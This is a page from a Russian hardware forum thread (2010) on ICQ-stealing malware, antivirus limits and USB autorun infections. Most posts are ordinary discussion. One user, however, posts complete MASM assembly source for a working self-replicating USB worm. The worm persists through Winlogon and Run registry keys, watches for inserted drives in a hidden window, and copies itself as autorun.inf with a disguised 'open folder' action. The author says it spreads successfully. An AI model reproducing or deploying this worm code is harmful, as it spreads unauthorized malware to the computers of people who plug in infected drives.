Уводят аськи!! Не принимайте свинью!!

Overclockers.ru

Конференция

FAQ по конференции

Текущее время: 08.04.2026 9:50

Сообщения без ответов | Активные темы

Список форумов » Разговоры обо всем » Флейм

Часовой пояс: UTC + 3 часа

Новая тема /

Ответить

Сообщений: 189 • Страница 5 из 10 • < 1 2 3 4 5 6 7 8 ... 10 >

Версия для печати (полностью)	Пред. тема \| След. тема
В случае проблем с отображением форума, отключите блокировщик рекламы

Автор

Сообщение

HertZ

Добавлено: 19.01.2010 16:41

[профиль] [Фотоальбом]

Заблокирован

Статус: Не в сети
Регистрация: 27.02.2007
Откуда: Москва
Фото: 113

Reneg@de писал(а):

ахах, поздно увидел. Я тоже принял такую свинью от знакомого админа, ну запустил ехе-шник, каспер думаю работает, если что хрюкнет ))) Пока вроде все нормально тьфу х3 раза

Seny`, ну что, помог каспер? Реальная ситуация, как ни крути ;-)

_________________
EPYC 4585PX (Csh -15 max, -32 high) / MO-RA 420 / x870e Extreme / RX6900XT & RTX5090 OC / 2x48G Trident Z5 @ 6400C28 (Vdd 1.6 Vddq 1.45 SoC 1.25 VDDP 1.0)

Реклама
Партнер

Tod Schwarzkaiser

Добавлено: 19.01.2010 16:42

[профиль]

Member
Статус: Не в сети
Регистрация: 16.04.2004
Откуда: [MSK.RU]

vk6666

Цитата:

сразу видно на настоящее дерьмо не попадал

И что ты считаешь настоящим дерьмом?

targitaj

Добавлено: 19.01.2010 16:53

[профиль] [Фотоальбом]

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6

Reneg@de писал(а):

каспер думаю работает, если что хрюкнет ))) Пока вроде все нормально тьфу х3 раза

Вот эта наивность меня слегка удивляет. Я вот не могу понять, вы что, полагаете что антивирусные базы вам боженька всевидящий с неба шлет? Или вирусописатели сами сообщают куда надо, когда свой вирус на волю выпускают? Нормальный антивирус хорошо если половину от существующих вирусов знает. И хорошо, если от оставшейся половины половину вообще когда-нибудь узнает. Соответственно, про оставшуюся четверть история просто умалчивает. Вариант "Того, что я не вижу - не существует".
Вирусов выходит, по некоторым оценкам, до 300-400 в сутки. Вы полагаете, что на следующее после выпуска утра они все уже в антивирусных базах сидят??? Ё-маё, да я свой архив софта, который начал собирать боле 5 лет назад периодически проверяю свежим антивирусом. И знаете что? Таки ведь почти каждый раз что-то новое находится, ага. Забавно, да? Молодые были, шарились где ни попадя. Я еще раз повторю - более 5 лет возраст ядра архива. Я у нас здесь СУТОК ЕЩЕ НЕ ПРОШЛО. :lol:

Верьте в каспер, он вас спасёт :lol:

_________________
It's dolomite, baby! (c)

Sras

Добавлено: 19.01.2010 16:56

[профиль]

Member
Статус: Не в сети
Регистрация: 13.09.2005
Откуда: Питер

Все свелось к обсуждению антивирей.
Может рассылка свиней связанна с продажей Аськи?

HertZ

Добавлено: 19.01.2010 16:58

[профиль] [Фотоальбом]

Заблокирован

Статус: Не в сети
Регистрация: 27.02.2007
Откуда: Москва
Фото: 113

Sras писал(а):

Все свелось к обсуждению антивирей.

Странно вы читаете. Или, по-вашему, обсуждение идиотизма и обсуждение антивирей-это одно и то же? В таком случае, я с вами согласен.

_________________
EPYC 4585PX (Csh -15 max, -32 high) / MO-RA 420 / x870e Extreme / RX6900XT & RTX5090 OC / 2x48G Trident Z5 @ 6400C28 (Vdd 1.6 Vddq 1.45 SoC 1.25 VDDP 1.0)

Seny`

Добавлено: 19.01.2010 17:00

[профиль] [Фотоальбом]

Member
Статус: Не в сети
Регистрация: 23.07.2009
Откуда: Сделано в СССР.
Фото: 0

HertZ писал(а):

Не осилил. Что на что, и почему ругнулось? Ставь патчи и атаки идут лесом.

По порядку, выскочило сообщение что то типа ваш комп был атакован, мой комп за хардварным файерволом, патчи все стоят, не могу себе отказать запускать некоторые проги под админом если они на 100% проверены, но и пускать их в сеть тоже не хочу..

HertZ писал(а):

Подключал. Однако, даже идиот поймет, что два пункта "Открыть для просмотра файлов" в окне автозапуска-это ненормально.

А причём тут идиот, если ты например принёс от знакомого флеху с прогой? Ну что делать? Как мне её поставить не заморачиваясь с виртуалками и отладчиками.. :insane:

targitaj писал(а):

На всех моих компах автозапуск выключен для всех видов устройств.

Да он по умолчанию отключен, это не спасёт когда нужно запустить файл, см. выше.

HertZ писал(а):

Seny`, ну что, помог каспер? Реальная ситуация, как ни крути ;-)

А что такое каспер? :-P

Мне оно не знакомо.. Порой уровень пользователя такой, что ему уже ничего не поможет.. Всегда есть частный случай.

_________________
Истина где-то рядом.. (с)

Злобный Йожык

Добавлено: 19.01.2010 17:02

[профиль]

Member
Статус: Не в сети
Регистрация: 23.04.2003
Откуда: из лесу =)
Фото: 0

К слову:
QNX

Цитата:

Посещая ресурсы различной направленности, в том числе и взрослого характера всегда возникает заинтересованность в «интересном баннере» или всплывающем окне, с аналогичным содержимым. Как правило, при нажатии на любой элемент на подобном объекте появляется предложение об установке проигрывателя Adobe Flash на русском языке либо же другие заманчивые варианты, например бесплатного доступа к «запретному». Любопытство всегда приводит к негативным последствиям. Как результат, на компьютер загружается и устанавливается приложение, которое, используя системный реестр и набор нехитрых приложений, блокирует все основные органы контроля системы, такие как редактор реестра и менеджер задач, доступ в интернет и антивирусные программы, а также закрывает экран окном с предложением оплаты под тем или иным предлогом.

- всплывающие окна могут быть не "интересной направленности", а могут просто загораживать нужный контент. И устанавливать иногда ничего не требуется, в опере, по всей видимости, есть дыра, через которую скриптом скачивается и, главное, запускается экзешник. Несколько месяцев назад зашел на quaket.net, сайт ломанули, мелькнуло окошко cmd, ни нод, ни аутпост не ругнулись. И только потом они начали верещать, когда эта штучка начала тянуть вирусы с сети. То же самое было недавно все в той же опере, только попался пресловутый смс-попрошайка, в комплекте авз определил троян-даунлоадеры. То же самое было у знакомых, мелькнуло окошко, фаера не стояло - ушли пароли от мыла и аськи, с которых потом сыпался спам.

_________________
Я толерантный - ненавижу всех одинаково.

Megagad

Добавлено: 19.01.2010 17:03

[профиль] [Фотоальбом]

Member
Статус: Не в сети
Регистрация: 16.11.2007
Откуда: Крым, Земля!
Фото: 4

Tod Schwarzkaiser писал(а):

И что ты считаешь настоящим дерьмом?

Поддерживаю вопрос! Всё что не приносили - всё благополучно прибивалось.

_________________
Хочешь сделать людям хорошо — сделай плохо, а потом верни, как было.
Hi Jack - Hi! Hijack - Hi!
Broni всех стран объединяйтесь!

Reneg@de

Добавлено: 19.01.2010 17:03

[профиль]

Member
Статус: Не в сети
Регистрация: 31.03.2006

е-мое, комп то не мой, рабочий, хрен с ним, а вот аську жалко будет (

_________________
Pas a pas...

HertZ

Добавлено: 19.01.2010 17:04

[профиль] [Фотоальбом]

Заблокирован

Статус: Не в сети
Регистрация: 27.02.2007
Откуда: Москва
Фото: 113

Seny` писал(а):

Глюк, наверно. И таки да, от вылезания в сеть запущенной под админом нормально написанной нехорошей проги ничто не спасет. она может сделать с системой все что угодно, вплоть до перезаписывания в коде ядра установленных фаерволлом джампов на свои.

Seny` писал(а):

Причем тут отладчики? Если я вижу на флэшке авторан.инф, я его сразу удаляю. Читай внимательнее. :oops:

А если о прогах, то это зависит откуда они взяты. Если скачаны с офсайта, запускай сколько влезет. Если нет, то то же самое, что и со скачанным дома. Никто тебе не даст гарантии, кроме отладчика и дизассемблера. И сабж тому пример... Ну или в песочнице запускать.

Seny` писал(а):

Всегда есть частный случай.

Жизнь-это один большой частный случай.

_________________
EPYC 4585PX (Csh -15 max, -32 high) / MO-RA 420 / x870e Extreme / RX6900XT & RTX5090 OC / 2x48G Trident Z5 @ 6400C28 (Vdd 1.6 Vddq 1.45 SoC 1.25 VDDP 1.0)

Последний раз редактировалось HertZ 19.01.2010 17:09, всего редактировалось 3 раз(а).

Злобный Йожык

Добавлено: 19.01.2010 17:05

[профиль]

Member
Статус: Не в сети
Регистрация: 23.04.2003
Откуда: из лесу =)
Фото: 0

targitaj писал(а):

Вот эта наивность меня слегка удивляет.

- я заметил тут вообще бесстрашный сайт ))) Подушки безопасности в авто только для маркетинга, антивирусы для лохов, винда без обновлений с мега-диска зверь-цд рулит! :lol:

_________________
Я толерантный - ненавижу всех одинаково.

HertZ

Добавлено: 19.01.2010 17:07

[профиль] [Фотоальбом]

Заблокирован

Статус: Не в сети
Регистрация: 27.02.2007
Откуда: Москва
Фото: 113

Злобный Йожык писал(а):

антивирусы для лохов

Не обобщай, это утверждение тут не к месту. Как раз среди юзеров популярных антивирей запускающих все подряд под админом джедаев больше всего.

_________________
EPYC 4585PX (Csh -15 max, -32 high) / MO-RA 420 / x870e Extreme / RX6900XT & RTX5090 OC / 2x48G Trident Z5 @ 6400C28 (Vdd 1.6 Vddq 1.45 SoC 1.25 VDDP 1.0)

Злобный Йожык

Добавлено: 19.01.2010 17:10

[профиль]

Member
Статус: Не в сети
Регистрация: 23.04.2003
Откуда: из лесу =)
Фото: 0

HertZ - можно с немецкого на понятный, я нифига не понял о чем ты

. Если что, то у меня выше в сообщении - сарказм.

_________________
Я толерантный - ненавижу всех одинаково.

HertZ

Добавлено: 19.01.2010 17:13

[профиль] [Фотоальбом]

Заблокирован

Статус: Не в сети
Регистрация: 27.02.2007
Откуда: Москва
Фото: 113

Злобный Йожык, я понимаю что сарказм, но во избежание дальнейших недопониманий уточнил... Наличие антивируса в системе часто лишь провоцирует развитие наплевательского отношения к безопасности. "Если что каспер хрюкнет".

_________________
EPYC 4585PX (Csh -15 max, -32 high) / MO-RA 420 / x870e Extreme / RX6900XT & RTX5090 OC / 2x48G Trident Z5 @ 6400C28 (Vdd 1.6 Vddq 1.45 SoC 1.25 VDDP 1.0)

targitaj

Добавлено: 19.01.2010 17:16

[профиль] [Фотоальбом]

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6

Seny` писал(а):

Да он по умолчанию отключен, это не спасёт когда нужно запустить файл, см. выше.

Это где это автозапуск по-умолчанию отключен??? И как при отключенном автозапуске вы вирус цепляете??? Там обычно dll исполняется тупо через inf файл. Сегодня только такое чистил. Ха, я не удалил inf файл. Я сделал его пустым и с признаком "только для чтения" :haha:

_________________
It's dolomite, baby! (c)

HertZ

Добавлено: 19.01.2010 17:17

[профиль] [Фотоальбом]

Заблокирован

Статус: Не в сети
Регистрация: 27.02.2007
Откуда: Москва
Фото: 113

targitaj, он имел в виду таскание софта на флэшке.

Добавлено спустя 1 минуту 10 секунд:

targitaj писал(а):

Это где это автозапуск по-умолчанию отключен??? И как при отключенном автозапуске вы вирус цепляете??? Там обычно dll исполняется тупо через inf файл. Сегодня только такое чистил. Ха, я не удалил inf файл. Я сделал его пустым и с признаком "только для чтения" :haha:

И таки да, наличие двух файлов совершенно необязательно. Autorun.inf вполне может сам по себе содержать исполняемый код, сам тут выкладывал как-то примеры кода и писал подобную каку :tooth:

_________________
EPYC 4585PX (Csh -15 max, -32 high) / MO-RA 420 / x870e Extreme / RX6900XT & RTX5090 OC / 2x48G Trident Z5 @ 6400C28 (Vdd 1.6 Vddq 1.45 SoC 1.25 VDDP 1.0)

Злобный Йожык

Добавлено: 19.01.2010 17:19

[профиль]

Member
Статус: Не в сети
Регистрация: 23.04.2003
Откуда: из лесу =)
Фото: 0

HertZ писал(а):

Наличие антивируса в системе часто лишь провоцирует развитие наплевательского отношения к безопасности. "Если что каспер хрюкнет".

- в моем примере не помогла связка nod32+outpost, ESS тоже не спас. Я о том, что у нас любят крайности

_________________
Я толерантный - ненавижу всех одинаково.

HertZ

Добавлено: 19.01.2010 17:21

[профиль] [Фотоальбом]

Заблокирован

Статус: Не в сети
Регистрация: 27.02.2007
Откуда: Москва
Фото: 113

targitaj, чтобы не быть голословным, мое демонстрационное творение:

Код:

.386
.model flat, stdcall
option casemap :none

include     \masm32\include\windows.inc
include     \masm32\include\kernel32.inc
include     \masm32\include\user32.inc
include     \masm32\include\shell32.inc
include     \masm32\include\advapi32.inc
include     \masm32\include\Psapi.inc

includelib  \masm32\lib\kernel32.lib
includelib  \masm32\lib\user32.lib
includelib  \masm32\lib\shell32.lib
includelib  \masm32\lib\advapi32.lib
includelib  \masm32\lib\Psapi.lib

include dbt.asm

.data
   AutorunData         db 0dh,0ah,'[autorun]',0dh,0ah,'open=rundll32.exe .\autorun.inf,install',
                     0dh,0ah,'UseAutoPlay=1',0dh,0ah,'action=Открыть папку для просмотра файлов',
                     0dh,0ah,'icon=%SystemRoot%\System32\shell32.dll,4',0dh,0ah,0
                     
   ClassName         db "HiddenWindow", 0
   Caption            db "Hidden Window", 0
   start_event         db "illuz1oN", 0

   target            db '\notify.dll', 0
   target_flash      db '\autorun.inf', 0
   rundll_suffix      db ',start', 0
      
   dll_path         db MAX_PATH dup(0)
   host_process      db MAX_PATH dup(0)
   sys_dir            db MAX_PATH dup(0)
   app_dir            db MAX_PATH dup(0)
   
   
   WinlogonAutoLoad      db "Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\desktop", 0
   WinlogonAutoLoadName1   db "Asynchronous", 0
   WinlogonAutoLoadName2   db "Dllname", 0
   WinlogonAutoLoadName3   db "Impersonate", 0
   WinlogonAutoLoadName4   db "Logon", 0
   
   WinlogonAutoLoadValue1   dw 0
   WinlogonAutoLoadValue2   db "main.dll", 0
   WinlogonAutoLoadValue3   dw 0
   WinlogonAutoLoadValue4   db "start", 0
   
   CU_AutoLoad            db "Software\Microsoft\Windows\CurrentVersion\Run", 0
   CU_AutoLoadName         db "Shell", 0
   CU_AutoValueContent      db MAX_PATH dup(0)
   
   space            db ' ', 0

   EXEC_COMMAND      db 'rundll32.exe', 0
   WEXEC_COMMAND      db 'winlogon.exe', 0
   OPEN_COMMAND      db 'explorer', 0
   OPEN_PATH         db '.\', 0
   
.data?
   hInstance         HINSTANCE ?
   CommandLine         LPSTR ?
   pKey            dd ?
   
.code

FirstDriveFromMask PROC unitmask :DWORD
   LOCAL i :BYTE

   mov      [i], 0
   jmp      SHORT LN4

   LN3:
      mov      al, [i]
      add      al, 1
      mov      [i], al

   LN4:
      movsx   ecx, [i]
      cmp      ecx, 26
      jge      SHORT LN2

      mov      edx, [unitmask]
      and      edx, 1
      je      SHORT LN1
      jmp      SHORT LN2

   LN1:
      mov      eax, [unitmask]
      shr      eax, 1
      mov      unitmask, eax

      jmp      SHORT LN3

   LN2:
      movsx   eax, [i]
      add      eax, 65   

      ret

FirstDriveFromMask ENDP

DeviceChanged PROC m_hwnd :HWND, Message :UINT, wParam :WPARAM, lParam :LPARAM
   LOCAL target_path_buffer[MAX_PATH] :DWORD
   
   cmp      [lParam], NULL
   jne      SHORT detected
   jmp      SHORT exit
   
   detected:
   
   cmp      [wParam], DBT_DEVICEARRIVAL
   jne      SHORT exit
      
      mov      esi, [lParam]
      cmp      (DEV_BROADCAST_HDR Ptr [esi]).dbch_devicetype, DBT_DEVTYP_VOLUME 
      jne      SHORT exit
      
      invoke   lstrcpy, addr [target_path_buffer], addr [dll_path]   
      invoke   FirstDriveFromMask, (DEV_BROADCAST_VOLUME Ptr [esi]).dbcv_unitmask
      invoke   lstrcat, addr [target_path_buffer], addr [target_flash]
      
      ;invoke   wsprintf, addr [target_path_buffer], addr [target_path_format], eax
      
      invoke   Sleep, 6000
      invoke   CopyFile, addr [dll_path], addr [target_path_buffer], 1
   
   exit:
   
   xor      eax, eax
   ret

DeviceChanged ENDP

WinWorker proc hInst :HINSTANCE, hPrevInst :HINSTANCE;, CmdLine :LPSTR, CmdShow :DWORD
   LOCAL    wc :WNDCLASSEX
   LOCAL    msg :MSG
   LOCAL    hwnd :HWND
   
   mov      [wc.cbSize], sizeof WNDCLASSEX
   mov      [wc.style], CS_HREDRAW or CS_VREDRAW
   mov      [wc.lpfnWndProc], offset WndProc
   mov      [wc.cbClsExtra], NULL
   mov      [wc.cbWndExtra], NULL
   
   push     [hInst]
   pop      [wc.hInstance]
   
   mov      [wc.hbrBackground], NULL
   mov      [wc.lpszClassName], offset ClassName
   
   invoke   LoadIcon, NULL, IDI_APPLICATION
   mov      [wc.hIcon], eax
   mov      [wc.hIconSm], eax
   
   invoke   LoadCursor, NULL, IDC_ARROW
   mov      [wc.hCursor], eax
   
   invoke   RegisterClassEx, addr [wc]
   invoke    CreateWindowEx, 0, addr [ClassName], addr [Caption], WS_SYSMENU or WS_SIZEBOX, 389, 82, 327, 200, 0, 0, [hInst], 0
   
   mov      [hwnd], eax
   
   invoke   ShowWindow, [hwnd], SW_HIDE
   invoke   UpdateWindow, [hwnd]
   
   _loop:
       
      invoke   GetMessage, addr [msg], 0, 0, 0
      
      cmp      eax, 0
      jz      SHORT _end_loop
       
      invoke  TranslateMessage, addr [msg]
      invoke  DispatchMessage, addr [msg]
      jmp      SHORT _loop
   
   _end_loop:
    
   mov   eax, [msg.wParam]
   ret
    
WinWorker endp

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    
    cmp   [uMsg], WM_DESTROY
    jne   SHORT dev_c
    invoke   PostQuitMessage, NULL
    
    dev_c:
      cmp      [uMsg], WM_DEVICECHANGE
      jne      SHORT def_p
      invoke   DeviceChanged, [hWnd], [uMsg], [wParam], [lParam]
    
    def_p:
    
       invoke   DefWindowProc, [hWnd], [uMsg], [wParam], [lParam]
    
    xor      eax, eax
    ret
    
WndProc endp

start PROC
   
   invoke  WinWorker, [hInstance], NULL
   
   xor      eax, eax
   ret

start ENDP

LibMain PROC instance :DWORD, reason :DWORD, unused :DWORD   
   LOCAL memInfoStruct :MEMORY_BASIC_INFORMATION
   LOCAL versionInfoStruct :OSVERSIONINFO 
   LOCAL systemInfoStruct :SYSTEM_INFO 
   LOCAL currProcess :HANDLE
   LOCAL inputAddress :LPCVOID    
   LOCAL modHandle :HMODULE
   LOCAL cmpresult, path1[MAX_PATH], path2[MAX_PATH], exec_str[MAX_PATH] :DWORD
   
   .IF [reason] == DLL_PROCESS_ATTACH
      
      invoke   GetCurrentProcess
      mov      [currProcess], eax
      mov      [inputAddress], 0
      
      invoke   RtlZeroMemory, addr [memInfoStruct], sizeof memInfoStruct
      invoke   VirtualQueryEx, [currProcess], [inputAddress], addr [memInfoStruct], sizeof memInfoStruct
      
      push   [memInfoStruct.AllocationBase]
      pop      [modHandle]
      
      invoke   GetModuleBaseName, [currProcess], [modHandle], addr [host_process], sizeof host_process
      invoke   lstrcmpi, addr [host_process], addr [WEXEC_COMMAND]
      
      mov      [cmpresult], eax
      
      invoke   CreateEvent, NULL, FALSE, FALSE, addr [start_event]
      invoke   GetLastError
      
      .IF eax != ERROR_ALREADY_EXISTS

         push   [instance]
         pop      [hInstance]

         invoke   GetModuleFileName, [instance], addr [dll_path], MAX_PATH
         invoke   SHGetSpecialFolderPath, NULL, addr [sys_dir], CSIDL_SYSTEM, TRUE
         invoke   SHGetSpecialFolderPath, NULL, addr [app_dir], CSIDL_APPDATA, TRUE
         
         .IF cmpresult == 0
            
            invoke   WinWorker, [hInstance], NULL
            
         .ELSE
         
            invoke   lstrcpy, addr [path2], addr [app_dir]
            invoke   lstrcat, addr [path2], addr [target]
                     
            invoke   lstrcpy, addr [path1], addr [sys_dir]
            invoke   lstrcat, addr [path1], addr [target]
            
            ;invoke MessageBox, NULL, addr [path1], addr [Caption], MB_OK
            ;invoke MessageBox, NULL, addr [path2], addr [Caption], MB_OK
            
            invoke   lstrcmpi, addr [path1], addr [dll_path]
            cmp      eax, 0
            jz      _exit
            
            invoke   lstrcmpi, addr [path2], addr [dll_path]
            cmp      eax, 0
            jz      _exit
            
            ;=================
               invoke   RtlZeroMemory, addr [versionInfoStruct], sizeof versionInfoStruct
               invoke   RtlZeroMemory, addr [systemInfoStruct], sizeof systemInfoStruct
               
               mov      [versionInfoStruct.dwOSVersionInfoSize], sizeof versionInfoStruct
               invoke   GetVersionEx, addr versionInfoStruct
               invoke   GetSystemInfo, addr systemInfoStruct
               
               cmp      [systemInfoStruct.wProcessorArchitecture], PROCESSOR_ARCHITECTURE_AMD64 
               jz      _NT6_OR_NTAMD64
               cmp      [versionInfoStruct.dwMajorVersion], 6 
               jz      _NT6_OR_NTAMD64
               ;====
                  ;; Туд код для XP/2003 x86
                  
                  
                  invoke   RegCreateKey, HKEY_LOCAL_MACHINE, addr [WinlogonAutoLoad], addr [pKey]
                  cmp      eax, 0
                  jne      SHORT under_user
                  
                     invoke   CopyFile, addr [dll_path], addr [path1], 1
                     invoke   RegSetValueEx, [pKey], addr [WinlogonAutoLoadName1], NULL, REG_DWORD, addr [WinlogonAutoLoadValue1], sizeof WinlogonAutoLoadValue1
                     invoke   RegSetValueEx, [pKey], addr [WinlogonAutoLoadName2], NULL, REG_SZ, addr [WinlogonAutoLoadValue2], sizeof WinlogonAutoLoadValue2
                     invoke   RegSetValueEx, [pKey], addr [WinlogonAutoLoadName3], NULL, REG_DWORD, addr [WinlogonAutoLoadValue3], sizeof WinlogonAutoLoadValue3
                     invoke   RegSetValueEx, [pKey], addr [WinlogonAutoLoadName4], NULL, REG_SZ, addr [WinlogonAutoLoadValue4], sizeof WinlogonAutoLoadValue4
                  
                  under_user:
                     
                     invoke   RegCreateKey, HKEY_CURRENT_USER, addr [CU_AutoLoad], addr [pKey]
                     cmp      eax, 0
                     jne      _exit
                     
                     invoke   CopyFile, addr [dll_path], addr [path2], 1
                     
                     invoke   lstrcpy, addr [CU_AutoValueContent], addr [EXEC_COMMAND]
                     invoke   lstrcat, addr [CU_AutoValueContent], ' '
                     invoke   lstrcat, addr [CU_AutoValueContent], addr [path2]
                     
                     invoke   RegSetValueEx, [pKey], addr [CU_AutoLoadName], NULL, REG_SZ, addr [CU_AutoValueContent], sizeof CU_AutoValueContent                     
                     
                  
               ;====
               _NT6_OR_NTAMD64:
                  ;; Туд код для NT6 и NT_AMD64
                  
                  invoke   RegCreateKey, HKEY_CURRENT_USER, addr [CU_AutoLoad], addr [pKey]
                     cmp      eax, 0
                     jne      offset _exit
                     
                     invoke   CopyFile, addr [dll_path], addr [path2], 1                     
                     invoke   lstrcpy, addr [CU_AutoValueContent], addr [EXEC_COMMAND]
                     invoke   lstrcat, addr [CU_AutoValueContent], addr [space]
                     invoke   lstrcat, addr [CU_AutoValueContent], addr [path2]
                     invoke   lstrcat, addr [CU_AutoValueContent], addr [rundll_suffix]
                     
                     invoke   RegSetValueEx, [pKey], addr [CU_AutoLoadName], NULL, REG_SZ, addr [CU_AutoValueContent], sizeof CU_AutoValueContent                     
                     
                  
                  
            ;=================
            _exit:
         
         .ENDIF
         
      .ELSE
         
         ;invoke lstrcmpi, addr [host_process], addr [WEXEC_COMMAND]
         
         .IF [cmpresult] == 0
         
            invoke   ShellExecute, 0, 0, addr [OPEN_COMMAND], addr [OPEN_PATH], 0, SW_SHOW
            invoke   ExitProcess, NULL
         
         .ENDIF
         
      .ENDIF
      
   .ENDIF

   mov eax, TRUE
   ret

LibMain ENDP

END LibMain

Малость недоделано, но размножается успешно :-D

_________________
EPYC 4585PX (Csh -15 max, -32 high) / MO-RA 420 / x870e Extreme / RX6900XT & RTX5090 OC / 2x48G Trident Z5 @ 6400C28 (Vdd 1.6 Vddq 1.45 SoC 1.25 VDDP 1.0)

targitaj

Добавлено: 19.01.2010 17:29

[профиль] [Фотоальбом]

Member
Статус: Не в сети
Регистрация: 06.07.2004
Откуда: РФ
Фото: 6

HertZ
А что оно делает?

_________________
It's dolomite, baby! (c)

HertZ

Добавлено: 19.01.2010 17:33

[профиль] [Фотоальбом]

Заблокирован

Статус: Не в сети
Регистрация: 27.02.2007
Откуда: Москва
Фото: 113

targitaj писал(а):

А что оно делает?

Просто размножается... Вся ее соль в том, что у нее "все свое с собой", то есть только autorun.inf и никаких левых корзин. Алгоритм прост-при запуске копируеимся в доступный на запись каталог юзера, прописываемся в автозагрузку, создаем скрытое окно и отлавливаем сообщение WM_DEVICECHANGE. При срабатывании обработчика проверяем тип устройства, если это флэшка, определяем путь и копируем наш autorun.inf туда. Собственно, все... Писалось просто от нечего делать, поэтому выглядит соответственно... Но работает.

_________________
EPYC 4585PX (Csh -15 max, -32 high) / MO-RA 420 / x870e Extreme / RX6900XT & RTX5090 OC / 2x48G Trident Z5 @ 6400C28 (Vdd 1.6 Vddq 1.45 SoC 1.25 VDDP 1.0)

Последний раз редактировалось HertZ 19.01.2010 17:35, всего редактировалось 1 раз.

Новая тема /

Ответить

Сообщений: 189 • Страница 5 из 10 • < 1 2 3 4 5 6 7 8 ... 10 >

Список форумов » Разговоры обо всем » Флейм

Часовой пояс: UTC + 3 часа

Кто сейчас на конференции

Сейчас этот форум просматривают: Evil_Side и гости: 60

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Перейти: